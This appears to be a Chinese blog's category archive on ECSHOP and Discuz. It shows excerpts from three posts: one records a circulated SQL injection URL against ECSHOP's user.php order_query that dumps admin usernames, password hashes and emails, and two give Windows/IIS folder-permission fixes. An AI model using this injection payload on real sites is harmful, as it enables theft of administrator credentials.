虽然这个漏洞是很久以前的事了,但我最近工作中曾涉及到。在此做个记录。
网上盛传的注入方法如下,
网址后跟代码
user.php?act=order_query&order_sn=’ union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*
爆出管理员ID、MD5密码散列、E信箱
我测试不能成功[......]
Browsing the archives for the ECSHOP与Discuz category
在windows2003服务器上安装ecshop到权限检查时,“特定目录修改权限检查”出现了部分目录不可修改的权限问题,详情如下:
模板可写性检查
所有模板,全部可写
特定目录修改权限检查
temp/caches 不可修改
temp/compiled 不可修改
temp/compiled/admin 不可修改
images/200810 不可修改
上网找过一些资料,只说权限不够,需要给IIS用户组加上‘修改’权限。
也有说VPS网站放C[......]
在安装PHP的CMS或论坛、网店系统时,常会遇到目录权限不够的情况。在windows系统中,这是在NTFS格式的分区下。
此时需要在相关目录上单击右键,选“属性”并切换到“安全性”选项卡,给相关用户(通常是IUSR_USER,详见IIS的设置)添加修改、写入等权限。
如果使用的是WIN XP 操作系统请依次选择“工具”-> “文件夹选项” ->“查看”,去掉“使用简单文件共享”前的勾,确定后文件夹“属性”对话框中才会有“安全[......]